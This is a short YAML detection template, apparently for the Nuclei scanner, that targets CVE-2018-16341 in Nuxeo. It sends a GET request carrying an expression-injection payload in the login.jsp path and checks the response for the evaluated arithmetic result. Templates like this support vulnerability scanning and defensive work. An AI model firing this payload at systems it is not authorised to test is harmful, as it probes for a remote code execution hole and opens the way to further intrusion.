id: CVE-2018-16341

info:
  name: Nuxeo Authentication Bypass Remote Code Execution
  author: madrobot
  severity: high
  description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
  tags: cve,cve2018,nuxeo,ssti,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
    matchers:
      - type: word
        words:
          - "31333333337"
        part: body